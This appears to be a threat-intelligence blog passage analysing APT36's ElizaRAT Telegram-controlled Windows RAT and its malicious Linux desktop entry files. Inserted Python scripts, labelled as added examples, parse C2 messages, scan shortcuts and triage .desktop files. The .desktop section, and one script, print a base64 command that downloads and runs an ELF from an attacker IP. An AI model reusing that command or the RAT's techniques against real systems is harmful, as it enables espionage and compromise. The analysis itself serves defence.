Introduction

In July 2023, Zscaler ThreatLabz discovered new malicious activity perpetrated by the Pakistan-based advanced persistent threat group APT36. APT36 is a sophisticated cyber threat group with a history of conducting targeted espionage operations in South Asia. We observed APT36 targeting Indian government sectors using a previously undocumented Windows RAT, new cyber espionage utilities for Linux, new distribution mechanisms, and a new attack vector against Linux environments.

In this blog, we will examine the latest tools employed by APT36, which are designed to target both Windows and Linux operating systems.

Key Takeaways
Brief Overview
Analysis of ElizaRAT, the New Windows RAT
Malicious Linux Desktop Entry Files as New Attack Vectors
New Python-Based Cyber Espionage Utilities Targeting Linux
Threat Attribution
Threat Actor Infrastructure
Conclusion
Zscaler Coverage
MITRE ATT&CK TTP Mapping
Indicators of Compromise (IOCs)

Key Takeaways

Updated arsenal of APT36: The threat actor has resurfaced with a fresh, fully functional Windows remote administration tool (RAT), novel tools for cyber espionage on Linux systems, innovative distribution methods, and additional attack vectors.
New Windows RAT: A custom RAT, referred to as ElizaRAT, has been incorporated into the APT36 toolkit. ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint.
Abuse of legitimate services: Legitimate services, such as Google Drive and Telegram, are abused in different stages of the attack chain.
New attack vectors for Linux: APT36 now weaponizes Linux desktop entry (.desktop) configuration files to target Linux-based endpoints in the Indian government sector.
Deceptive tactics: The threat actor took extensive measures to conceal any link to Pakistan. They chose the infrastructure and artifacts meticulously to make it appear as though the activities were conducted in India.
Reuse of infrastructure: In some cases, the same C2 infrastructure is being used by APT36 for both credential phishing attacks and distributing malicious binaries.

Brief Overview

APT36 is an advanced persistent threat (APT) group which we attribute to Pakistan with very high confidence. This group has been active since 2013 and primarily targets the Indian government, defense, and education sectors.

This group leverages credential harvesting and malware distribution attacks to conduct cyber espionage. APT36 utilizes:

Custom-built remote administration tools targeting Windows
Lightweight Python-compiled cyber espionage tools, each serving a specific purpose, targeting Windows and Linux
Weaponized open-source C2 frameworks like Mythic
Trojanized installers of Indian government applications like KAVACH multi-factor authentication
Trojanized Android apps
Credential phishing sites targeting Indian government officials

Analysis of ElizaRAT, the New Windows RAT

We assigned the moniker “ElizaRAT” to this new Windows-based backdoor utilized by APT36 due to the distinctive strings identified within the commands observed during our real-time analysis of the C2 communication channel.

ElizaRAT is distributed as .NET binaries inside password-protected archive files hosted on Google Drive. During our threat analysis, we gathered several samples of ElizaRAT, and they all shared these characteristics:

They are all .NET binaries compiled as Control Panel applets (CPL) and use the “.cpl” file extension. To the best of our knowledge, this is the first time APT36 has weaponized the CPL file format.
The binaries are large – ranging from 4MB to 16MB.
Costura (a Fody add-in) was used to embed the required .NET assemblies as resources inside the main executable, which is what inflates the binary size.
The Telegram Bot API is used for C2 communication.

For this technical analysis, we use the following file metadata:

MD5 hash: fc99daa2e1b47bae4be51e5e59aef1f0
Filename: AgendaMeeting.cpl

Since this Windows RAT arrives on the endpoint in the form of a Control Panel applet, the first method called upon execution is CplApplet().

This method transfers control to Program().Main() which in turn invokes an asynchronous task – MainAsync(). Inside this task, all important malicious operations are carried out.

The image below shows Program().Main() kick starting the malicious activities on the endpoint.

Figure 1: The MainAsync() method used to start the malicious activities on the endpoint.

Some of the key operations performed by ElizaRAT are:

Initializes the Telegram bot with Communicate.ConnectMe() using the hard-coded Telegram bot token and sets it up in polling mode to receive commands from the threat actor.
Creates a directory: %appdata%\TextSource
Generates a UUID and username specific to the infected machine.
Drops and displays a decoy PDF file to the user.
Sets up persistence on the machine.
Fetches details of the antivirus software running on the machine and sends the information to the attacker-controlled Telegram bot.

In the following sections, we dive deeper into some of these operations.

Logging Operation

Each execution result is logged on both the endpoint (client-side) and the Telegram bot (server-side).

The code below shows that logging is done at the local and remote level.

// remote logging in the Telegram bot
await Communication.send_message("Username Created with name : " + TextSource.Settings._username);
// local logging on the infected endpoint
File.AppendAllText(TextSource.Settings.log_p, "username created local\n");

Unique Identifier Generation

A UUID and a username are generated for each infected machine so that the threat actor can uniquely identify the victim. The RAT uses Windows Management Instrumentation (WMI) to fetch the machine's processor ID and system UUID, and derives both values from them.

The two values differ only by a “.cookie” suffix: the username is the generated UUID without the “.cookie” extension.

The image below shows the relevant code used to generate these values.

Figure 2: The getusername() method used to generate the UUID and username to identify the infected machine.

C2 Command Format

Since the threat actor uses the same Telegram bot to manage multiple infected endpoints, they use a specific C2 command format to synchronize the operations and ensure that a given command executes only on the intended endpoint.

The C2 command format looks like this:

<command>*<username>*<arguments>

C2 Commands

All C2 commands are handled in a switch-case statement by the Bot_OnMessage() method inside the Communicate class. Before executing any command, the RAT extracts the username from the C2 command and compares it with the infected machine's username; the command is executed only if the two values match.

The following C2 commands are supported by the bot:

Table 1: C2 commands supported by the Telegram bot

C2 COMMAND | FUNCTIONALITY
/dir | Fetches the list of files in the specified directory.
/upload | Uploads (exfiltrates) the specified file from the victim's machine.
/getprocess | Gets the list of processes running on the victim's machine. The list is returned in a file named getproc.dll.
/run | Executes the specified program on the victim's machine.
/delete | Deletes the specified file.
/end | Kills the specified processes on the victim's machine.
/online | Checks whether the infected machine is online.
/identity | Connects to the specified website from the victim's machine and relays the response to the threat actor. This can be used to fetch the machine's public IP address by supplying a parameter like hxxps://api.ipify[.]org.
/ping | Checks internet connectivity from the victim's machine to the specified website.
/scr | Takes a screenshot of the victim's machine and sends it to the threat actor in a file named scr.dll.
/createdir | Creates a directory on the victim's machine.
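The command format and the per-victim gate described above, as an added example that is not Zscaler's or the malware's code: a parser for the <command>*<username>*<arguments> layout, the username check from Bot_OnMessage(), and a replay helper that reconstructs which victim each captured bot message was aimed at. The captured messages and usernames are constructed, and treating only the first two '*' characters as separators (so a wildcard in a path argument survives) is an assumption about how the implant splits the string.

```python
"""Parser and per-victim gate for ElizaRAT's Telegram C2 message format.

Added example, not Zscaler's or ElizaRAT's code: it reimplements the documented
<command>*<username>*<arguments> layout and the username check from Bot_OnMessage()
so captured bot traffic can be replayed offline. Sample messages are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Table 1 above; anything else is dropped before the username check.
SUPPORTED_COMMANDS = frozenset({
    "/dir", "/upload", "/getprocess", "/run", "/delete", "/end",
    "/online", "/identity", "/ping", "/scr", "/createdir",
})


@dataclass(frozen=True)
class C2Message:
    command: str
    username: str
    arguments: str


def parse_c2_message(text: str) -> Optional[C2Message]:
    """Split one bot message into its fields; None if it is not a well-formed command.

    Assumption: only the first two '*' separate fields, so an argument such as a
    /dir wildcard may itself contain '*'. A trailing arguments field may be absent."""
    parts = text.strip().split("*", 2)
    if len(parts) < 2 or parts[0] not in SUPPORTED_COMMANDS or not parts[1]:
        return None
    return C2Message(parts[0], parts[1], parts[2] if len(parts) == 3 else "")


def should_execute(msg: C2Message, local_username: str) -> bool:
    """The gate the implant applies: act only if the embedded username is ours."""
    return msg.username == local_username


def replay(messages: List[str], local_username: str
           ) -> Tuple[List[C2Message], Dict[str, List[C2Message]], List[str]]:
    """Replay captured bot messages from the point of view of one infected host.

    Returns (commands this host would execute, per-victim timeline for every
    username seen, raw messages that are not valid commands)."""
    mine: List[C2Message] = []
    timeline: Dict[str, List[C2Message]] = {}
    invalid: List[str] = []
    for raw in messages:
        msg = parse_c2_message(raw)
        if msg is None:
            invalid.append(raw)
            continue
        timeline.setdefault(msg.username, []).append(msg)
        if should_execute(msg, local_username):
            mine.append(msg)
    return mine, timeline, invalid


# Constructed sample: an operator driving two victims through one bot.
CAPTURED = [
    "/online*a1b2c3d4*",
    "/dir*a1b2c3d4*C:\\Users\\admin\\Documents\\*.docx",
    "/scr*e5f6a7b8*",
    "/upload*a1b2c3d4*C:\\Users\\admin\\Documents\\agenda.docx",
    "/identity*e5f6a7b8*https://api.ipify.org",
    "just chatting",
    "/format*a1b2c3d4*C:",
]

if __name__ == "__main__":
    mine, timeline, invalid = replay(CAPTURED, "a1b2c3d4")
    for m in mine:
        print("would execute:", m)
    print("victims seen:", sorted(timeline))
    print("ignored:", invalid)
```

The same parser can be pointed at an exported chat history of the bot to build a per-victim timeline of operator activity; messages that fail the format or name an unsupported command are kept separately rather than silently dropped, since operator typos and chatter are themselves useful context.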

Persistence

In order to achieve persistence on the infected machine, the RAT creates a Windows shortcut file (LNK) in the Windows Startup directory.

The image below shows the code used to create this shortcut file. The name of the shortcut file is fetched from the “orig_name” setting defined in the config. In this case, the shortcut file is called TextSource.lnk.

Figure 3: The buildforts() method used to create a Windows shortcut file in the Startup directory for persistence.

The description of this shortcut file is set to “Text Editing APP for Windows” to disguise it as a text editing application, making it seem innocuous. In addition, the shortcut's target command line executes the Control Panel applet via rundll32.
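A triage script for the persistence artifact above, added here as an example and not Zscaler's or the malware's code: it parses just enough of the Windows shell link format (header, LinkInfo local path, and the StringData fields) to recover a shortcut's description, target and arguments, and flags any Startup-folder shortcut whose command line runs a .cpl through rundll32. The two .lnk files it checks are constructed fixtures; the description string comes from the analysis above, while the rundll32 argument string (shell32.dll,Control_RunDLL plus a path under %appdata%\TextSource) and the file name AgendaMeeting.cpl are assumed, since the page does not show the exact target command line.

```python
"""Triage of Startup-folder shortcuts for the rundll32 + .cpl persistence pattern.

Added example, not Zscaler's or ElizaRAT's code. Parses only the parts of the
MS-SHLLINK format needed here (header, LinkInfo local path, StringData)."""
import os
import struct

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))


def parse_lnk(data: bytes) -> dict:
    """Return description, target hints and arguments from a .lnk file's bytes."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the item ID list; strings are enough here
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    info = {"local_base_path": None}
    if flags & HAS_LINK_INFO:
        size, _header_size, li_flags = struct.unpack_from("<III", data, pos)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath: ANSI, NUL-terminated
            off = struct.unpack_from("<I", data, pos + 16)[0]
            end = data.index(b"\x00", pos + off)
            info["local_base_path"] = data[pos + off:end].decode("latin-1")
        pos += size

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            raw, pos = data[pos:pos + 2 * count], pos + 2 * count
            return raw.decode("utf-16-le")
        raw, pos = data[pos:pos + count], pos + count
        return raw.decode("latin-1")

    for field, bit in STRING_FIELDS:             # StringData appears in this fixed order
        info[field] = read_string() if flags & bit else None
    return info


def is_cpl_autorun(info: dict) -> bool:
    """True when the shortcut launches a Control Panel applet via rundll32."""
    parts = (info.get("local_base_path"), info.get("relative_path"), info.get("arguments"))
    cmdline = " ".join(p for p in parts if p).lower()
    return "rundll32" in cmdline and ".cpl" in cmdline


def build_lnk(description: str, relative_path: str, arguments: str) -> bytes:
    """Constructed fixture: a minimal Unicode .lnk carrying only NAME, RELATIVE_PATH and ARGUMENTS."""
    flags = HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def s(value: str) -> bytes:
        return struct.pack("<H", len(value)) + value.encode("utf-16-le")

    return header + s(description) + s(relative_path) + s(arguments)


# Assumed shape of the ElizaRAT shortcut: the description is from the analysis above;
# the Control_RunDLL argument string and applet path are assumptions for illustration.
SUSPECT_LNK = build_lnk(
    "Text Editing APP for Windows", "rundll32.exe",
    r'shell32.dll,Control_RunDLL "C:\Users\victim\AppData\Roaming\TextSource\AgendaMeeting.cpl"')
BENIGN_LNK = build_lnk("Notepad", "notepad.exe", "")


def scan_startup_folder(folder: str) -> list:
    """Names of .lnk files in `folder` that match the pattern (for live triage on a host)."""
    hits = []
    for entry in os.scandir(folder):
        if entry.is_file() and entry.name.lower().endswith(".lnk"):
            with open(entry.path, "rb") as fh:
                try:
                    if is_cpl_autorun(parse_lnk(fh.read())):
                        hits.append(entry.name)
                except ValueError:
                    pass
    return hits


if __name__ == "__main__":
    startup = os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")
    print(scan_startup_folder(startup) if os.path.isdir(startup) else "no Startup folder here")
```

Shortcuts written by the Windows Script Host usually carry a LinkInfo block with the local path, which is why the checker concatenates the local base path, relative path and arguments before looking for rundll32 and .cpl; the per-user Startup folder path in the usage block is the standard location and can be swapped for the all-users one.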

Displaying Decoy Content

The method dosome() defined in the Program class is responsible for displaying the decoy PDF file to the user. This decoy file is present inside the resources section of the .NET binary.

The image below shows the decoy file. It is only used to distract the victim and make it appear that an error occurred when opening the file.

Figure 4: Decoy PDF file displayed to the user.

Malicious Linux Desktop Entry Files as New Attack Vectors

The use of Linux desktop entry files by APT36 as an attack vector has not been documented before. This attack vector is fairly new and appears to be used in very low-volume attacks. So far, our research team has discovered three samples, all of which had zero detections on VirusTotal.

We first observed an occurrence in May 2023 when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files.

National Informatics Center (NIC), India Phishing Attack – May 2023

In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel.

We also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip URL.

From here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.

Here are some technical details about this case:

ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
ZIP filename: Delegation_Saudi_Arabia.zip
Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
Desktop entry filename: Delegation_Saudi_Arabia.desktop

Desktop entry file analysis

We found the following content in the desktop entry file:

[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c "echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1RyaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8gL3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3ItbWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh"
Terminal=false
Type=Application
Icon=x-office-document

The Icon key is set to “x-office-document” so that the entry displays with an office-document icon, and its Name ends in .pdf, so in a file manager it looks like an innocuous document rather than a launcher.

The base64-encoded command inside the desktop entry file decodes to:

/usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185.elf
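A static triage script for this attack vector, added as an example and not Zscaler's or APT36's code: it parses a .desktop entry, flags the three decoy traits seen above (a document-like Name on a Type=Application entry, an office icon in front of a shell one-liner, and a base64 blob in Exec), decodes the blob, and pulls out the download URLs, the paths written by wget, the file marked executable, and the binary the decoy viewer is piped into. The sample entry is a copy of the Delegation_Saudi_Arabia.desktop content shown above, so the decoded command ends with the pipe into ./185.elf that actually runs the downloaded ELF; the script never fetches anything, and the regexes for the wget/chmod/pipe patterns are heuristics of this example rather than anything from the page.

```python
"""Static triage of a Linux .desktop entry for the decoy-document launcher pattern.

Added example, not Zscaler's or APT36's code. The sample entry below is a copy of
the Delegation_Saudi_Arabia.desktop content from the analysis above; the script
only decodes it and never fetches anything."""
import base64
import binascii
import configparser
import re

ENCODED_COMMAND = (
    "L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R"
    "yaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g"
    "L3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2"
    "h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It"
    "bWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1"
    "LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn"
    "BkZiB8IC4vMTg1LmVsZg=="
)
SAMPLE_DESKTOP = f"""[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Saudi_Arabia.pdf
Exec=sh -c "echo '{ENCODED_COMMAND}' | base64 -d | sh"
Terminal=false
Type=Application
Icon=x-office-document
"""

# Heuristics used by this example (not from the page).
DOCUMENT_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)$", re.I)
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;]+")
WGET_OUTPUT = re.compile(r"-O\s+([^\s;]+)")
CHMOD_X = re.compile(r"chmod \+x ([^\s;]+)")
PIPED_EXEC = re.compile(r"\|\s*\./([^\s;|]+)")


def decode_exec_payload(exec_value: str):
    """Return the shell command hidden as a base64 blob in an Exec= value, or None."""
    match = BASE64_BLOB.search(exec_value)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(0), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage_desktop_entry(text: str) -> dict:
    """Flag decoy-document traits and pull IOCs out of the encoded Exec command."""
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.read_string(text)
    entry = parser["Desktop Entry"]
    name, exec_value = entry.get("Name", ""), entry.get("Exec", "")
    findings = []
    if DOCUMENT_NAME.search(name) and entry.get("Type") == "Application":
        findings.append("document-like Name on a Type=Application launcher")
    if entry.get("Icon", "").startswith("x-office-") and "sh -c" in exec_value:
        findings.append("office-document icon in front of a shell one-liner")
    decoded = decode_exec_payload(exec_value)
    if decoded is not None:
        findings.append("base64-encoded command in Exec")
    cmd = decoded or ""
    return {
        "name": name,
        "findings": findings,
        "decoded": decoded,
        "urls": URL.findall(cmd),
        "dropped": WGET_OUTPUT.findall(cmd),
        "made_executable": CHMOD_X.findall(cmd),
        "piped_exec": PIPED_EXEC.findall(cmd),
    }


def defang(url: str) -> str:
    """Make a URL safe to paste into a report."""
    return url.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    report = triage_desktop_entry(SAMPLE_DESKTOP)
    for finding in report["findings"]:
        print("-", finding)
    print("decoded:", report["decoded"])
    for url in report["urls"]:
        print("url:", defang(url))
    print("dropped:", report["dropped"], "executed:", report["piped_exec"])
```

Run over a directory of extracted archives, the same function gives a quick yes/no on each .desktop file plus the hosts and drop paths to block or hunt for; the base64 regex deliberately requires a long run of base64 characters so that ordinary Exec values with a short argument are not flagged.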